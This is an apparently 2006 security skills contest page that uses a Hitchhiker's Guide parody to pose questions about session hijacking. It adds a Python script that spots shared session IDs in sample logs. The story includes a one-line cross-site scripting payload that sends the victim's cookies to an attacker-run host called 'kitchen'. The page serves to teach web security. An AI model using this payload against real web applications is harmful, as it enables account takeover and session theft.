The Hitch-Hacker’s Guide to the Galaxy

November 1, 2006

New Skillz Challenge!


"Don't Panic, challenge fans!  We have a new challenge for you, by my good buddy Jay Beale.  Match wits with the Vogons to help Core Prefect land a ride and score some choice sushi.  Have fun with this challenge, my dear readers!"

–Ed Skoudis
Intelguardians
Author, Counter Hack Reloaded

Please read Jay’s challenge, compose your answers, and e-mail them to skillz1106@ethicalhacker.net with the 'Subject: Skillz Submission' by November 30, 2006.  Mike will choose three winners in early December, who will receive an autographed copy of Ed's book, Malware: Fighting Malicious Code. We’ll award a prize to the best technical answer, another to the most creative technically correct answer, and a third will be drawn from all answers submitted, whether correct or not.  So, even if you cannot answer all of the questions, or aren’t sure about your ideas, go ahead and send in what you have.  You just might win the prize in the random draw category.

Feel free to discuss the scenario in the forums but PLEASE do not post your answers.
You wouldn't want someone else winning your prize, would you?

Skillz Sponsored by Core Security Technologies

By Jay Beale

Core Prefect shot his hand straight up into the air, activating the electronic Thumb, a Sub-etha signaling device that indicated he was looking to hitchhike.  His signal would be picked up by every life form cool enough to listen, which luckily did not include the Vogons.  The dreaded Vogons were busy operating the demolition fleet that hovered above Earth.  Their commander’s voice boomed planet wide through any surface that could reasonably be expected to act as a speaker, as well as a few that couldn’t: “As you will no doubt be aware, the plans for development of the outlying regions of the Galaxy require the building of a hyperspatial express route through your star system, and regrettably your planet is one of those scheduled for demolition.  The process will take slightly less than two of your Earth minutes.  Thank you.”

Core hoped the Dentrassis were listening for his signal – they were his only hope.  The Vogons employed the Dentrassis as cooks on their ships and while the Vogons didn’t pick up hitchhikers, the Dentrassis were known to let a few on board just to cheese off the Vogons.

The Sub-etha hitchhiker request alarm blared suddenly, so loud that Dentrassis cook Zan Zeutrino dropped the slab of yellowtail sushi he was cutting right onto the floor. Cursing the loss of the fish and the wonderful mercury it provided, he picked up the radio.  Its screen showed coordinates for two hitchhikers requesting a ride.  Zeutrino thought, “What the heck? Maybe they’ll be sushi connoisseurs!” and set about to get the hitchhikers onboard.  The Vogons might pay well, but they had no appreciation for fine sushi…

Zeutrino started up a Galaxy-wide web browser on the kitchen’s wall computer.  The Vogons used Vogsworld, a COTS all-in-one web application that could manage everything on the ship, from calendaring to navigation to e-mail.  Zeutrino quickly sent an e-mail to the matter transference operator, one of the ugliest Vogons on the ship.

Zeutrino crafted the following e-mail for the Vogon:

To: mattertransference
Fr: Vogon Commander Jeltz
Subject: Guard promotion

You have been promoted to Guard Level 1.  This is a big promotion, including much screaming, stomping and throwing people out of airlocks.  Please report to the bridge for your papers and issuance of your new low-slung laser pistol, pictured here:

<script>document.write('<img src=http://kitchen/pistol.gif?cookies='+escape(document.cookie)+'>')</script>

Zeutrino set up a mini web server on the kitchen wall computer, sent the e-mail, and waited for a request.

The request came in, along with some very useful data.  Zeutrino quickly connected to Vogsworld, logged in as himself and used the data to switch users to the Vogon matter transference officer’s account.  He surfed to the matter transference control page, configured it to beam up the hitchhikers, and quickly began preparing a special roll for them.

As Core Prefect and his human friend Amiga were beamed up onto the ship, Pal Homeran, a Vogon system administrator, was reading Vogsworld logs.  Unfortunately for the Hitchhikers, Vogons loved reading their logs, which made them very good system administrators.  Homeran had found a problem.  Clearly there had been an unauthorized beam-up just now.  He alerted his commander, who readied the Vogon Poetry of Doom…
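As an added illustration (not part of the original challenge and not an official answer), one check a log reviewer can run is whether a single session identifier was presented by more than one client. The log format, the host name `transporter`, the paths and the session values below are constructed assumptions; only the host name `kitchen` comes from the story.

```python
import re

# Constructed access-log lines in an assumed format:
#   <client> <time> "<method> <path>" <status> sid=<session id>
SAMPLE_LOG = """\
transporter 10:01:12 "POST /login" 200 sid=-
transporter 10:01:13 "GET /mail/inbox" 200 sid=a3f9c2
kitchen 10:02:40 "POST /login" 200 sid=-
kitchen 10:02:41 "GET /mail/compose" 200 sid=77b0e1
transporter 10:05:02 "GET /mail/view?id=42" 200 sid=a3f9c2
kitchen 10:05:30 "GET /transference/control" 200 sid=a3f9c2
kitchen 10:05:44 "POST /transference/beam" 200 sid=a3f9c2
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<time>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" '
    r'(?P<status>\d{3}) sid=(?P<sid>\S+)$'
)

def parse(log_text):
    """Yield one dict per well-formed line; lines that do not parse are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()

def find_shared_sessions(log_text):
    """Return one alert per (session id, new client) pair seen after first use."""
    owner = {}        # sid -> client that first presented it
    reported = set()  # (sid, client) pairs already alerted on
    alerts = []
    for rec in parse(log_text):
        sid, client = rec["sid"], rec["client"]
        if sid == "-":                      # request carried no session cookie
            continue
        first = owner.setdefault(sid, client)
        if client != first and (sid, client) not in reported:
            reported.add((sid, client))
            alerts.append({
                "sid": sid,
                "first_client": first,
                "second_client": client,
                "time": rec["time"],
                "request": f'{rec["method"]} {rec["path"]}',
            })
    return alerts

if __name__ == "__main__":
    for alert in find_shared_sessions(SAMPLE_LOG):
        print(alert)
```

Clients behind a shared proxy or with changing addresses can trip this check, so an alert is a lead to investigate rather than proof of a hijacked session.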

Questions:

1) How did Zan Zeutrino gather the desired data to switch users to the Vogon matter transference officer’s user account?
2) How did Zeutrino switch users?
3) What might Pal Homeran have seen in his logs?
4) What should Zeutrino do next?
5) What should Pal Homeran do next?

 


Remember, please submit your answers to skillz1106@ethicalhacker.net with the Subject: 'Skillz Submission' by Nov 30, 2006. In early December, we’ll announce three winners, one from each of these categories:

· Best technical answer
· Most creative and technically correct answer
· Random draw from all answers submitted, correct, incorrect, complete, partially complete, etc.

Each winner gets a copy of Malware: Fighting Malicious Code, autographed by author Ed Skoudis, congratulating you on your victory and amazing abilities!

And… by the way, what is the significance of the word count in Ed’s intro at the start of this challenge?
